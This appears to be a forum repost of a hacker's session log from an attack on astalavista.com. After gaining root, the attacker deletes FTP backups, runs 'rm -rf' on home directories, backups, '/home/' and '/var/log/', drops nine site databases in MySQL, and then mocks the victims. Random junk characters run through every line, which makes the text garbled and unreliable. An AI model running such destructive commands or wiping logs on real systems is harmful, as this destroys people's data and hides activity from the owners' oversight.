-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
- R I9 O+ @* r+ A& y* D-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar' y q; p+ P) r e4 \
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar( o& T( f' ^5 K# h5 i; O% X
[snip]
& w& f p& \4 n; l! h+ @& r226 Transfer complete.: G1 O' X5 Z+ j: u
ftp> mdelete *
5 j( V" Y' ?* l' Y* k5 H# }- G/ vftp> ls -la
( L& b* n9 X x6 F4 m227 Entering Passive Mode (212,254,194,163,2,193)
, E: b" j0 J7 R- v150 Opening BINARY mode data connection for ‘file list’.
2 _' o' c* P2 x' C0 ]4 V ~/ m226 Transfer complete.% f) \6 T% e+ Y4 G8 C9 J) {
ftp>
/ n8 N6 ~ e+ r+ d3 N0 e8 M0 e& h L' `$ e" e+ X
sh-3.2# cd /home* e7 k; y! f% S6 M) V" Z5 I
sh-3.2# ls -la, G/ Y" Y8 n2 e( m
total 120
; {' r u- c2 _drwxr-xr-x 14 root root 4096 Mar 11 17:56 .) b. ^+ K; V* A4 z8 X; r: e+ Z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 x9 p+ y: N# j* m0 p
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin" K# q* P$ _# u. F3 R
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. _4 ?( c/ F" ~3 q
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user1 T( a0 S( i1 l/ G7 d
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
2 c; j' y: x, O# G1 Edrwxr-xr-x 2 root root 4096 Jul 29 2008 backup, h( F! v( C2 F6 y
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
7 [6 |/ U/ M* `+ Rdrwx–x–x 10 com com 4096 Apr 28 12:40 com* X. _/ P& {/ b. _4 u ]' j
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
0 L$ q. |5 W7 ^drwx—— 3 jon jon 4096 Sep 21 2007 jon! ]3 s$ d( I q1 q! r4 Z
drwx—— 2 root root 16384 Sep 11 2007 lost+found
7 l# ^6 S! h5 k# Q: t+ z3 Wdrwxr-xr-x 2 root root 4096 Sep 14 2007 my. a6 m0 }$ o: L0 g: d: l$ Q2 P
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, h# s( _+ e. n/ j6 q$ ? w4 R
drwx—— 2 jon jon 4096 Sep 15 2007 test
4 n; \# A# {7 l6 C0 odrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
- H( E3 B( Z- x8 R! a( Q* O0 |0 k+ w4 w
sh-3.2# rm -rf backup/
+ S7 E* F# j3 Z v# A5 wsh-3.2# rm -rf backup.14161/
m8 a/ [9 v; Psh-3.2# rm -rf ftp/0 S$ w8 m1 |0 X9 r6 D0 \% _" G1 p4 i; u
sh-3.2# rm -rf jon/! ?4 @/ R& c7 E( A& g; I) P2 ]
sh-3.2# rm -rf my/# F6 Q) u' z* h/ U k. ]
sh-3.2# rm -rf mysqldata/
) g$ _/ P6 h% m- Tsh-3.2# rm -rf test/
5 H0 ~* F8 k; p2 ^ o" y& k( dsh-3.2# rm -rf tmp/& v' M9 T9 ~) k+ S4 q- @2 w
sh-3.2# cd ~
0 ^' T' Y f, @; Z# ysh-3.2# rm -rf *
5 x% K8 `: k' x4 I3 Y* j0 W0 t; A" qsh-3.2# rm -rf /var/log/ f- r& J5 N0 H0 c0 n) O/ R
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
7 ~) U- ?7 `- F; K! F. Zsh-3.2# rm -rf /home/* N- V! ?6 c0 Z: G' }: o
sh-3.2# mysql* J, z0 O W0 h3 E
Welcome to the MySQL monitor. Commands end with ; or \g.- ?3 A6 }" i- [9 ]* Z3 t, k
Your MySQL connection id is 407156) B4 `3 t* s; w
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
4 w8 J9 d. ~/ h$ r: @+ T. T
- W6 d8 `. b+ u/ m3 yType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) d9 I0 L" g* w9 X6 G( L
3 s& c C% r3 w! M6 h4 v$ N& ]2 z6 Nmysql> show databases;0 ^5 M& u( ]! _: Y
+———————–+
: y! Q0 k2 V* f( x9 O| Database |
7 B0 ^' z% X* n$ B5 t. Z9 Z+———————–+
1 @: K5 ^- M, J4 l' I, v0 d| information_schema |
9 A- j S( X4 |# ^5 A| astanet_ads |
0 t% }! b2 N* c| astanet_mailing_lists |8 [7 w# p7 I0 M, d
| astanet_mediawiki |
: T' t* H$ x2 c, ]) m| astanet_membersystem |6 ^ V; G" g& F3 j! X/ p
| com_contrexx |/ W3 z, `, `! D
| com_contrexx2 | t, S) W0 z$ z1 ^- b
| com_contrexx2_live |, s) z$ b4 H$ S0 e% t+ M) d- e2 H
| da_roundcube |! s) M" W# [. P% s& q- @
| dolphin |" s$ X; }! L, m9 g8 H3 l7 E) Q- z
| ideapool |
) E# }; W0 I; K# m! U. x3 A: w| mysql |# J4 W4 m$ k. J8 G1 Q3 h6 S
| test |3 p& H' u& V+ h# v7 T$ d
| yourmaster |( B% z2 C+ j1 Y- F J5 ]& e' X
+———————–+8 f# ?3 P8 ?( _* b' |
14 rows in set (0.03 sec); P. }' P8 M( @. z9 e# R) ^
( { c9 u) r/ z: m& z
mysql> drop database astanet_membersystem;
& q V+ Y I. w% q: j3 idroQuery OK, 46 rows affected (0.81 sec)
8 [$ c: r# }. S
& u1 Q; X9 O) y9 x( imysql> drop database com_contrexx;
8 Q- j$ H6 O% {4 |2 B# l6 WQuery OK, 211 rows affected (2.72 sec)
) z; Q' h8 c+ U, |: t0 g' a. f+ s5 X& s' V! e: w" W- r0 i! P
mysql> drop database com_contrexx2;. m2 P7 T, H( F8 Q; {. ^+ S
Query OK, 237 rows affected (2.23 sec)
, }6 Y" Z3 L4 d! h+ K4 ]& j6 p3 U) ~
mysql> drop database com_contrexx2_live;
: g) b% v# z* Y$ r+ D. HQuery OK, 227 rows affected (7.63 sec)" o) j; \, E! a. o0 \) J
/ }/ Y3 H3 w- M Xmysql> drop database ideapool;
; X$ B+ F% o3 L) u8 \) XQuery OK, 69 rows affected (0.19 sec)
, S5 R6 g/ ~) [7 N
% u& m+ Z; J% a! L+ r5 qmysql> drop database yourmaster;6 E+ K0 k" ^8 Q) t# @
Query OK, 158 rows affected (0.55 sec)
$ `7 h- Y# r* P; j% J$ p
# ?& a u8 t$ u7 {. V9 O; _( q) k* u! Tmysql> drop database astanet_ads;
u5 h. F2 x# Z8 H, I. B v+ RQuery OK, 9 rows affected (0.11 sec)7 v* w( ^7 G. h/ j" H8 a" k
+ h# w9 [5 [4 n% f& [" e( ^! x
mysql> drop database astanet_mailing_lists;" |. u1 m5 K K8 l
Query OK, 24 rows affected (1.47 sec)0 T0 t( Q4 [/ E' k
9 O" N' G3 M7 H
mysql> drop database astanet_mediawiki;
2 h0 O% f2 I& S$ tQuery OK, 31 rows affected (0.51 sec)- g4 o0 I/ M; F: F% A+ z2 S
! q4 p0 s! Q" \) p8 K9 @
mysql> show databases;
6 {1 Z4 V. u* Y! a" [7 |+——————–+
4 S" M- k8 T2 Y# j6 @' e| Database |5 h" {; W# y0 ^8 u) n! X
+——————–+# z1 m' [% ^8 v
| information_schema |
) W( _) c1 a/ g, X* ~| da_roundcube |, s* S& n) t) y4 m9 j" W: H" G5 a
| dolphin |
/ e' _2 N; q1 @: ?( o| mysql |( p$ D% V O( y, W2 W1 x- N
| test |2 E; M! d. b9 l
+——————–+- O! [/ X1 m* U/ Z
5 rows in set (0.00 sec)+ F2 G* N" k, e+ `
2 X+ r8 s8 w3 D" cWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
8 |6 z" O( I L* jtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the) O, I- ]4 \0 A6 w4 ^& t* x0 W9 j M
wrong to say this pack of morons *wont be back*.
4 V8 M2 c% O/ ~7 y; a: t$ s8 C |
发表于 2012-11-6 21:07:34
收藏
支持
反对